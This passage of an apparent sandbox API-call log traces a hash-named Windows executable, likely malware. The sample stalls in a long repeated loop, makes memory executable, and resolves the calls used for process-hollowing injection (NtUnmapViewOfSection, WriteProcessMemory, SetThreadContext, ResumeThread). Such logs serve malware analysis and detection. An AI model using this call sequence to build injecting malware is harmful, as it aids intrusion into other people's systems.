returned 0 [0095.019] GetSystemDefaultLangID () returned 0x2710409 [0095.019] GetThreadLocale () returned 0x409 [0095.019] GetCurrentProcess () returned 0xffffffff [0095.019] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.019] GetSystemDefaultLangID () returned 0x2710409 [0095.019] GetThreadLocale () returned 0x409 [0095.019] GetCurrentProcess () returned 0xffffffff [0095.019] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.019] GetSystemDefaultLangID () returned 0x2710409 [0095.019] GetThreadLocale () returned 0x409 [0095.019] GetCurrentProcess () returned 0xffffffff [0095.019] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.019] GetSystemDefaultLangID () returned 0x2710409 [0095.019] GetThreadLocale () returned 0x409 [0095.019] GetCurrentProcess () returned 0xffffffff [0095.019] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.019] GetSystemDefaultLangID () returned 0x2710409 [0095.019] GetThreadLocale () returned 0x409 [0095.019] GetCurrentProcess () returned 0xffffffff [0095.019] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.019] GetSystemDefaultLangID () returned 0x2710409 [0095.019] GetThreadLocale () returned 0x409 [0095.019] GetCurrentProcess () returned 0xffffffff [0095.019] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.019] GetSystemDefaultLangID () returned 0x2710409 [0095.020] GetThreadLocale () returned 0x409 [0095.020] GetCurrentProcess () returned 0xffffffff [0095.020] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.020] GetSystemDefaultLangID () returned 0x2710409 [0095.020] GetThreadLocale () returned 0x409 [0095.020] GetCurrentProcess () returned 0xffffffff [0095.020] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.020] GetSystemDefaultLangID () returned 0x2710409 [0095.020] GetThreadLocale () returned 0x409 [0095.020] GetCurrentProcess () returned 0xffffffff [0095.020] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.020] GetSystemDefaultLangID () returned 0x2710409 [0095.020] GetThreadLocale () returned 0x409 [0095.020] GetCurrentProcess () returned 0xffffffff [0095.020] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.020] GetSystemDefaultLangID () returned 0x2710409 [0095.020] GetThreadLocale () returned 0x409 [0095.020] GetCurrentProcess () returned 0xffffffff [0095.020] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.020] GetSystemDefaultLangID () returned 0x2710409 [0095.020] GetThreadLocale () returned 0x409 [0095.020] GetCurrentProcess () returned 0xffffffff [0095.020] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.021] GetSystemDefaultLangID () returned 0x2710409 [0095.021] GetThreadLocale () returned 0x409 [0095.021] GetCurrentProcess () returned 0xffffffff [0095.021] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.021] GetSystemDefaultLangID () returned 0x2710409 [0095.021] GetThreadLocale () returned 0x409 [0095.021] GetCurrentProcess () returned 0xffffffff [0095.021] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.021] GetSystemDefaultLangID () returned 0x2710409 [0095.021] GetThreadLocale () returned 0x409 [0095.021] GetCurrentProcess () returned 0xffffffff [0095.021] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.021] GetSystemDefaultLangID () returned 0x2710409 [0095.021] GetThreadLocale () returned 0x409 [0095.021] GetCurrentProcess () returned 0xffffffff [0095.021] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.021] GetSystemDefaultLangID () returned 0x2710409 [0095.021] GetThreadLocale () returned 0x409 [0095.021] GetCurrentProcess () returned 0xffffffff [0095.021] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.021] GetSystemDefaultLangID () returned 0x2710409 [0095.021] GetThreadLocale () returned 0x409 [0095.021] GetCurrentProcess () returned 0xffffffff [0095.021] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.021] GetSystemDefaultLangID () returned 0x2710409 [0095.021] GetThreadLocale () returned 0x409 [0095.021] GetCurrentProcess () returned 0xffffffff [0095.021] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.022] GetSystemDefaultLangID () returned 0x2710409 [0095.022] GetThreadLocale () returned 0x409 [0095.022] GetCurrentProcess () returned 0xffffffff [0095.022] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.022] GetSystemDefaultLangID () returned 0x2710409 [0095.022] GetThreadLocale () returned 0x409 [0095.022] GetCurrentProcess () returned 0xffffffff [0095.022] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.022] GetSystemDefaultLangID () returned 0x2710409 [0095.022] GetThreadLocale () returned 0x409 [0095.022] GetCurrentProcess () returned 0xffffffff [0095.022] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.022] GetSystemDefaultLangID () returned 0x2710409 [0095.022] GetThreadLocale () returned 0x409 [0095.022] GetCurrentProcess () returned 0xffffffff [0095.022] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.022] GetSystemDefaultLangID () returned 0x2710409 [0095.022] GetThreadLocale () returned 0x409 [0095.022] GetCurrentProcess () returned 0xffffffff [0095.022] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.022] GetSystemDefaultLangID () returned 0x2710409 [0095.022] GetThreadLocale () returned 0x409 [0095.022] GetCurrentProcess () returned 0xffffffff [0095.022] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.022] GetSystemDefaultLangID () returned 0x2710409 [0095.022] GetThreadLocale () returned 0x409 [0095.023] GetCurrentProcess () returned 0xffffffff [0095.023] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.023] GetSystemDefaultLangID () returned 0x2710409 [0095.023] GetThreadLocale () returned 0x409 [0095.023] GetCurrentProcess () returned 0xffffffff [0095.023] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.023] GetSystemDefaultLangID () returned 0x2710409 [0095.023] GetThreadLocale () returned 0x409 [0095.023] GetCurrentProcess () returned 0xffffffff [0095.023] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.023] GetSystemDefaultLangID () returned 0x2710409 [0095.023] GetThreadLocale () returned 0x409 [0095.023] GetCurrentProcess () returned 0xffffffff [0095.023] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.023] GetSystemDefaultLangID () returned 0x2710409 [0095.023] GetThreadLocale () returned 0x409 [0095.023] GetCurrentProcess () returned 0xffffffff [0095.023] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.023] GetSystemDefaultLangID () returned 0x2710409 [0095.023] GetThreadLocale () returned 0x409 [0095.023] GetCurrentProcess () returned 0xffffffff [0095.023] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.023] GetSystemDefaultLangID () returned 0x2710409 [0095.023] GetThreadLocale () returned 0x409 [0095.023] GetCurrentProcess () returned 0xffffffff [0095.023] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.024] GetSystemDefaultLangID () returned 0x2710409 [0095.024] GetThreadLocale () returned 0x409 [0095.024] GetCurrentProcess () returned 0xffffffff [0095.024] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.024] GetSystemDefaultLangID () returned 0x2710409 [0095.024] GetThreadLocale () returned 0x409 [0095.024] GetCurrentProcess () returned 0xffffffff [0095.024] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.024] GetSystemDefaultLangID () returned 0x2710409 [0095.024] GetThreadLocale () returned 0x409 [0095.024] GetCurrentProcess () returned 0xffffffff [0095.024] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.025] GetSystemDefaultLangID () returned 0x2710409 [0095.025] GetThreadLocale () returned 0x409 [0095.025] GetCurrentProcess () returned 0xffffffff [0095.025] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.025] GetSystemDefaultLangID () returned 0x2710409 [0095.025] GetThreadLocale () returned 0x409 [0095.025] GetCurrentProcess () returned 0xffffffff [0095.025] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.025] GetSystemDefaultLangID () returned 0x2710409 [0095.025] GetThreadLocale () returned 0x409 [0095.025] GetCurrentProcess () returned 0xffffffff [0095.025] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.025] GetSystemDefaultLangID () returned 0x2710409 [0095.025] GetThreadLocale () returned 0x409 [0095.025] GetCurrentProcess () returned 0xffffffff [0095.025] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.025] GetSystemDefaultLangID () returned 0x2710409 [0095.025] GetThreadLocale () returned 0x409 [0095.025] GetCurrentProcess () returned 0xffffffff [0095.025] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.025] GetSystemDefaultLangID () returned 0x2710409 [0095.025] GetThreadLocale () returned 0x409 [0095.025] GetCurrentProcess () returned 0xffffffff [0095.025] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.025] GetSystemDefaultLangID () returned 0x2710409 [0095.025] GetThreadLocale () returned 0x409 [0095.025] GetCurrentProcess () returned 0xffffffff [0095.026] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.026] GetSystemDefaultLangID () returned 0x2710409 [0095.026] GetThreadLocale () returned 0x409 [0095.026] GetCurrentProcess () returned 0xffffffff [0095.026] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.026] GetSystemDefaultLangID () returned 0x2710409 [0095.026] GetThreadLocale () returned 0x409 [0095.026] GetCurrentProcess () returned 0xffffffff [0095.026] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.026] GetSystemDefaultLangID () returned 0x2710409 [0095.026] GetThreadLocale () returned 0x409 [0095.026] GetCurrentProcess () returned 0xffffffff [0095.026] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.026] GetSystemDefaultLangID () returned 0x2710409 [0095.026] GetThreadLocale () returned 0x409 [0095.026] GetCurrentProcess () returned 0xffffffff [0095.026] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.026] GetSystemDefaultLangID () returned 0x2710409 [0095.026] GetThreadLocale () returned 0x409 [0095.026] GetCurrentProcess () returned 0xffffffff [0095.026] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.026] GetSystemDefaultLangID () returned 0x2710409 [0095.026] GetThreadLocale () returned 0x409 [0095.026] GetCurrentProcess () returned 0xffffffff [0095.026] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.026] GetSystemDefaultLangID () returned 0x2710409 [0095.026] GetThreadLocale () returned 0x409 [0095.027] GetCurrentProcess () returned 0xffffffff [0095.027] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.027] GetSystemDefaultLangID () returned 0x2710409 [0095.027] GetThreadLocale () returned 0x409 [0095.027] GetCurrentProcess () returned 0xffffffff [0095.027] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.027] GetSystemDefaultLangID () returned 0x2710409 [0095.027] GetThreadLocale () returned 0x409 [0095.027] GetCurrentProcess () returned 0xffffffff [0095.027] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.027] GetSystemDefaultLangID () returned 0x2710409 [0095.027] GetThreadLocale () returned 0x409 [0095.027] GetCurrentProcess () returned 0xffffffff [0095.027] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.027] GetSystemDefaultLangID () returned 0x2710409 [0095.027] GetThreadLocale () returned 0x409 [0095.027] GetCurrentProcess () returned 0xffffffff [0095.027] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.027] GetSystemDefaultLangID () returned 0x2710409 [0095.027] GetThreadLocale () returned 0x409 [0095.027] GetCurrentProcess () returned 0xffffffff [0095.027] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.027] GetSystemDefaultLangID () returned 0x2710409 [0095.027] GetThreadLocale () returned 0x409 [0095.027] GetCurrentProcess () returned 0xffffffff [0095.027] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.027] GetSystemDefaultLangID () returned 0x2710409 [0095.027] GetThreadLocale () returned 0x409 [0095.028] GetCurrentProcess () returned 0xffffffff [0095.028] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.028] GetSystemDefaultLangID () returned 0x2710409 [0095.028] GetThreadLocale () returned 0x409 [0095.028] GetCurrentProcess () returned 0xffffffff [0095.028] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.028] GetSystemDefaultLangID () returned 0x2710409 [0095.028] GetThreadLocale () returned 0x409 [0095.028] GetCurrentProcess () returned 0xffffffff [0095.028] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.028] GetSystemDefaultLangID () returned 0x2710409 [0095.028] GetThreadLocale () returned 0x409 [0095.028] GetCurrentProcess () returned 0xffffffff [0095.028] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.028] GetSystemDefaultLangID () returned 0x2710409 [0095.028] GetThreadLocale () returned 0x409 [0095.028] GetCurrentProcess () returned 0xffffffff [0095.028] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.028] GetSystemDefaultLangID () returned 0x2710409 [0095.028] GetThreadLocale () returned 0x409 [0095.028] GetCurrentProcess () returned 0xffffffff [0095.028] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.028] GetSystemDefaultLangID () returned 0x2710409 [0095.028] GetThreadLocale () returned 0x409 [0095.028] GetCurrentProcess () returned 0xffffffff [0095.028] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.028] GetSystemDefaultLangID () returned 0x2710409 [0095.028] GetThreadLocale () returned 0x409 [0095.029] GetCurrentProcess () returned 0xffffffff [0095.029] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.029] GetSystemDefaultLangID () returned 0x2710409 [0095.029] GetThreadLocale () returned 0x409 [0095.029] GetCurrentProcess () returned 0xffffffff [0095.029] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.029] GetSystemDefaultLangID () returned 0x2710409 [0095.029] GetThreadLocale () returned 0x409 [0095.029] GetCurrentProcess () returned 0xffffffff [0095.029] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.029] GetSystemDefaultLangID () returned 0x2710409 [0095.029] GetThreadLocale () returned 0x409 [0095.029] GetCurrentProcess () returned 0xffffffff [0095.029] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.029] GetSystemDefaultLangID () returned 0x2710409 [0095.029] GetThreadLocale () returned 0x409 [0095.029] GetCurrentProcess () returned 0xffffffff [0095.029] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.029] GetSystemDefaultLangID () returned 0x2710409 [0095.029] GetThreadLocale () returned 0x409 [0095.029] GetCurrentProcess () returned 0xffffffff [0095.029] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.029] GetSystemDefaultLangID () returned 0x2710409 [0095.029] GetThreadLocale () returned 0x409 [0095.029] GetCurrentProcess () returned 0xffffffff [0095.029] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.030] GetSystemDefaultLangID () returned 0x2710409 [0095.030] GetThreadLocale () returned 0x409 [0095.030] GetCurrentProcess () returned 0xffffffff [0095.030] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.030] GetSystemDefaultLangID () returned 0x2710409 [0095.030] GetThreadLocale () returned 0x409 [0095.030] GetCurrentProcess () returned 0xffffffff [0095.030] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.030] GetSystemDefaultLangID () returned 0x2710409 [0095.030] GetThreadLocale () returned 0x409 [0095.030] GetCurrentProcess () returned 0xffffffff [0095.030] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.030] GetSystemDefaultLangID () returned 0x2710409 [0095.030] GetThreadLocale () returned 0x409 [0095.030] GetCurrentProcess () returned 0xffffffff [0095.030] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.030] GetSystemDefaultLangID () returned 0x2710409 [0095.030] GetThreadLocale () returned 0x409 [0095.030] GetCurrentProcess () returned 0xffffffff [0095.030] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.030] GetSystemDefaultLangID () returned 0x2710409 [0095.030] GetThreadLocale () returned 0x409 [0095.030] GetCurrentProcess () returned 0xffffffff [0095.030] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.030] GetSystemDefaultLangID () returned 0x2710409 [0095.030] GetThreadLocale () returned 0x409 [0095.030] GetCurrentProcess () returned 0xffffffff [0095.030] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.031] GetSystemDefaultLangID () returned 0x2710409 [0095.031] GetThreadLocale () returned 0x409 [0095.031] GetCurrentProcess () returned 0xffffffff [0095.031] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.031] GetSystemDefaultLangID () returned 0x2710409 [0095.031] GetThreadLocale () returned 0x409 [0095.031] GetCurrentProcess () returned 0xffffffff [0095.031] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.031] GetSystemDefaultLangID () returned 0x2710409 [0095.031] GetThreadLocale () returned 0x409 [0095.031] GetCurrentProcess () returned 0xffffffff [0095.031] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.031] GetSystemDefaultLangID () returned 0x2710409 [0095.031] GetThreadLocale () returned 0x409 [0095.031] GetCurrentProcess () returned 0xffffffff [0095.031] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.031] GetSystemDefaultLangID () returned 0x2710409 [0095.031] GetThreadLocale () returned 0x409 [0095.031] GetCurrentProcess () returned 0xffffffff [0095.031] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.031] GetSystemDefaultLangID () returned 0x2710409 [0095.031] GetThreadLocale () returned 0x409 [0095.031] GetCurrentProcess () returned 0xffffffff [0095.031] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.031] GetSystemDefaultLangID () returned 0x2710409 [0095.031] GetThreadLocale () returned 0x409 [0095.031] GetCurrentProcess () returned 0xffffffff [0095.032] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.032] GetSystemDefaultLangID () returned 0x2710409 [0095.032] GetThreadLocale () returned 0x409 [0095.032] GetCurrentProcess () returned 0xffffffff [0095.032] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0095.032] GetSystemDefaultLangID () returned 0x2710409 [0095.032] GetThreadLocale () returned 0x409 [0095.788] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x752b0000 [0095.789] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x752b0000 [0095.789] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualProtect") returned 0x752c4317 [0095.789] VirtualProtect (in: lpAddress=0x240020, dwSize=0x91148, flNewProtect=0x40, lpflOldProtect=0x18e818 | out: lpflOldProtect=0x18e818*=0x4) returned 1 [0095.891] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x752b0000 [0095.891] GetProcAddress (hModule=0x752b0000, lpProcName="GlobalAlloc") returned 0x752c5846 [0095.891] GetProcAddress (hModule=0x752b0000, lpProcName="GetLastError") returned 0x752c11c0 [0095.891] GetProcAddress (hModule=0x752b0000, lpProcName="Sleep") returned 0x752c10ff [0095.891] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualAlloc") returned 0x752c1836 [0095.892] GetProcAddress (hModule=0x752b0000, lpProcName="CreateToolhelp32Snapshot") returned 0x752e7327 [0095.892] GetProcAddress (hModule=0x752b0000, lpProcName="Module32First") returned 0x75346279 [0095.892] GetProcAddress (hModule=0x752b0000, lpProcName="CloseHandle") returned 0x752c13f0 [0095.892] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x5c [0095.894] Module32First (hSnapshot=0x5c, lpme=0x18e5a4) returned 1 [0095.896] VirtualAlloc (lpAddress=0x0, dwSize=0x11a5a0, flAllocationType=0x1000, flProtect=0x40) returned 0x3de0000 [0096.003] LoadLibraryA (lpLibFileName="user32") returned 0x76860000 [0096.003] GetProcAddress (hModule=0x76860000, lpProcName="MessageBoxA") returned 0x768cfd1e [0096.004] GetProcAddress (hModule=0x76860000, lpProcName="GetMessageExtraInfo") returned 0x7689ed76 [0096.004] LoadLibraryA (lpLibFileName="kernel32") returned 0x752b0000 [0096.004] GetProcAddress (hModule=0x752b0000, lpProcName="WinExec") returned 0x75343051 [0096.004] GetProcAddress (hModule=0x752b0000, lpProcName="CreateFileA") returned 0x752c537e [0096.004] GetProcAddress (hModule=0x752b0000, lpProcName="WriteFile") returned 0x752c1282 [0096.004] GetProcAddress (hModule=0x752b0000, lpProcName="CloseHandle") returned 0x752c13f0 [0096.004] GetProcAddress (hModule=0x752b0000, lpProcName="CreateProcessA") returned 0x752c1072 [0096.004] GetProcAddress (hModule=0x752b0000, lpProcName="GetThreadContext") returned 0x752e799c [0096.004] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualAlloc") returned 0x752c1836 [0096.004] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualAllocEx") returned 0x752dd980 [0096.004] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualFree") returned 0x752c184e [0096.004] GetProcAddress (hModule=0x752b0000, lpProcName="ReadProcessMemory") returned 0x752dcfa4 [0096.004] GetProcAddress (hModule=0x752b0000, lpProcName="WriteProcessMemory") returned 0x752dd9b0 [0096.005] GetProcAddress (hModule=0x752b0000, lpProcName="SetThreadContext") returned 0x75345933 [0096.005] GetProcAddress (hModule=0x752b0000, lpProcName="ResumeThread") returned 0x752c43a7 [0096.005] GetProcAddress (hModule=0x752b0000, lpProcName="WaitForSingleObject") returned 0x752c1136 [0096.005] GetProcAddress (hModule=0x752b0000, lpProcName="GetModuleFileNameA") returned 0x752c1491 [0096.005] GetProcAddress (hModule=0x752b0000, lpProcName="GetCommandLineA") returned 0x752c5159 [0096.005] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x76f00000 [0096.010] GetProcAddress (hModule=0x76f00000, lpProcName="NtUnmapViewOfSection") returned 0x76f1fc70 [0096.010] GetProcAddress (hModule=0x76f00000, lpProcName="NtWriteVirtualMemory") returned 0x76f1fe04 [0096.011] GetProcAddress (hModule=0x76860000, lpProcName="RegisterClassExA") returned 0x7687db98 [0096.011] GetProcAddress (hModule=0x76860000, lpProcName="CreateWindowExA") returned 0x7687d22e [0096.011] GetProcAddress (hModule=0x76860000, lpProcName="PostMessageA") returned 0x76883baa [0096.011] GetProcAddress (hModule=0x76860000, lpProcName="GetMessageA") returned 0x76877bd3 [0096.011] GetProcAddress (hModule=0x76860000, lpProcName="DefWindowProcA") returned 0x76f424e0 [0096.011] GetProcAddress (hModule=0x752b0000, lpProcName="GetFileAttributesA") returned 0x752c53cc [0096.011] GetProcAddress (hModule=0x752b0000, lpProcName="GetStartupInfoA") returned 0x752c0e00 [0096.011] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualProtectEx") returned 0x75344b5f [0096.011] GetProcAddress (hModule=0x752b0000, lpProcName="ExitProcess") returned 0x752c79c8 [0096.011] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\keecfmwgj\\desktop\\apfhq")) returned 0xffffffff [0096.011] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\keecfmwgj\\desktop\\apfhq")) returned 0xffffffff [0096.012] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\keecfmwgj\\desktop\\apfhq")) returned 0xffffffff [0096.012] RegisterClassExA (param_1=0x18e260) returned 0x25c1d1 [0096.012] CreateWindowExA (dwExStyle=0x200, lpClassName="saodkfnosa9uin", lpWindowName="mfoaskdfnoa", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x7018a [0096.026] PostMessageA (hWnd=0x7018a, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0096.026] GetMessageA (in: lpMsg=0x18e290, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e290) returned 1 [0096.026] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0096.026] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x210000, nSize=0x2800 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe")) returned 0x5f [0096.026] GetStartupInfoA (in: lpStartupInfo=0x18e1b4 | out: lpStartupInfo=0x18e1b4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, 